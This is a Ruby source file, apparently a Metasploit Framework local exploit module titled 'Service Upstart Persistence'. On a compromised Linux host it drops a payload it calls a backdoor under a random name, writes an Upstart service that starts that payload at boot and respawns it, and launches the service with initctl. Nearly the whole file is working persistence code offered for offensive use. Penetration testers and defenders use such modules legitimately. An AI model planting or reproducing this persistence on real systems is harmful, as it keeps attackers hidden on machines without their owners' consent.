1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::Unix
11
  include Msf::Exploit::EXE # for generate_payload_exe
12
  include Msf::Exploit::FileDropper
13
  include Msf::Exploit::Local::Persistence
14
  prepend Msf::Exploit::Remote::AutoCheck
15
  include Msf::Exploit::Deprecated
16
  moved_from 'exploits/linux/local/service_persistence'
17

18
  def initialize(info = {})
19
    super(
20
      update_info(
21
        info,
22
        'Name' => 'Service Upstart Persistence',
23
        'Description' => %q{
24
          This module will create a service on the box, and mark it for auto-restart.
25
          We need enough access to write service files and potentially restart services
26
          Targets:
27
          CentOS 6
28
          Fedora >= 9, < 15
29
          Ubuntu >= 9.10, <= 14.10
30
        },
31
        'License' => MSF_LICENSE,
32
        'Author' => [
33
          'h00die',
34
        ],
35
        'Platform' => ['unix', 'linux'],
36
        'Targets' => [
37
          [
38
            'Upstart', {
39
              runlevel: '2345'
40
            }
41
          ],
42
        ],
43
        'DefaultTarget' => 0,
44
        'Privileged' => true,
45
        'Arch' => [
46
          ARCH_CMD,
47
          ARCH_X86,
48
          ARCH_X64,
49
          ARCH_ARMLE,
50
          ARCH_AARCH64,
51
          ARCH_PPC,
52
          ARCH_MIPSLE,
53
          ARCH_MIPSBE
54
        ],
55
        'References' => [
56
          ['URL', 'https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples'],
57
          ['ATT&CK', Mitre::Attack::Technique::T1543_CREATE_OR_MODIFY_SYSTEM_PROCESS],
58
          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
59
          ['URL', 'http://blog.terminal.com/getting-started-with-upstart/']
60
        ],
61
        'SessionTypes' => ['shell', 'meterpreter'],
62
        'Notes' => {
63
          'Stability' => [CRASH_SAFE],
64
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
65
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
66
        },
67
        'DisclosureDate' => '2006-08-24' # upstart release date
68
      )
69
    )
70

71
    register_options(
72
      [
73
        OptString.new('PAYLOAD_NAME', [false, 'Name of shell file to write']),
74
        OptString.new('SERVICE', [false, 'Name of service to create']),
75
        OptInt.new('RESTART_LIMIT', [false, 'Name of service to create', 3]),
76
        OptEnum.new('INIT_FOLDER', [false, 'Init folder location', 'auto', ['auto', 'init', 'init.d']])
77
      ]
78
    )
79
  end
80

81
  def init_folder
82
    if datastore['INIT_FOLDER'] == 'init' ||
83
       (
84
         datastore['INIT_FOLDER'] == 'auto' &&
85
         exists?('/etc/init')
86
       )
87
      return '/etc/init'
88
    end
89

90
    '/etc/init.d'
91
  end
92

93
  def check
94
    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if writable_dir.start_with?('/tmp')
95
    return CheckCode::Safe("#{writable_dir} isnt writable") unless writable?(writable_dir)
96
    return CheckCode::Safe("#{init_folder} isnt writable") unless writable?(init_folder)
97

98
    return CheckCode::Safe('Likely not an upstart based system') unless command_exists?('initctl')
99

100
    CheckCode::Appears("#{writable_dir} is writable and system is upstart based")
101
  end
102

103
  def install_persistence
104
    backdoor = write_shell(writable_dir)
105

106
    path = backdoor.split('/')[0...-1].join('/')
107
    file = backdoor.split('/')[-1]
108

109
    upstart(path, file, target.opts[:runlevel])
110
  end
111

112
  def write_shell(path)
113
    file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10)
114
    backdoor = "#{path}/#{file_name}"
115
    vprint_status("Writing backdoor to #{backdoor}")
116
    if payload.arch.first == 'cmd'
117
      write_file(backdoor, payload.encoded)
118
      chmod(backdoor, 0o711)
119
    else
120
      upload_and_chmodx backdoor, generate_payload_exe
121
    end
122
    @clean_up_rc << "rm #{backdoor}\n"
123

124
    fail_with(Failure::NoAccess, 'File not written, check permissions.') unless file_exist?(backdoor)
125

126
    backdoor
127
  end
128

129
  def upstart(backdoor_path, backdoor_file, runlevel)
130
    script = <<~EOF
131
      description "Start daemon at boot time"
132
      start on filesystem or runlevel [#{runlevel}]
133
      stop on shutdown
134
      # Ensure only one instance runs
135
      pre-start script
136
          if [ -f /var/run/#{backdoor_file}.pid ] && kill -0 $(cat /var/run/#{backdoor_file}.pid) 2>/dev/null; then
137
              echo "#{backdoor_file} is already running."
138
              exit 1
139
          fi
140
      end script
141
      script
142
          echo $$ > /var/run/#{backdoor_file}.pid
143
          exec #{backdoor_path}/#{backdoor_file}
144
      end script
145
      post-stop script
146
          rm -f /var/run/#{backdoor_file}.pid
147
          sleep 10
148
      end script
149
      respawn
150
      respawn limit #{datastore['RESTART_LIMIT']} 300
151
    EOF
152
    service_filename = datastore['SERVICE'] || Rex::Text.rand_text_alpha(7..12)
153
    service_name = "#{init_folder}/#{service_filename}.conf"
154
    vprint_status("Writing service: #{service_name}")
155
    write_file(service_name, script)
156

157
    fail_with(Failure::NoAccess, 'Service file not written, check permissions.') unless file_exist?(service_name)
158

159
    @clean_up_rc << "rm #{service_name}"
160
    vprint_status('Starting service')
161
    cmd_exec("initctl start #{service_filename}")
162
  end
163
end
164

165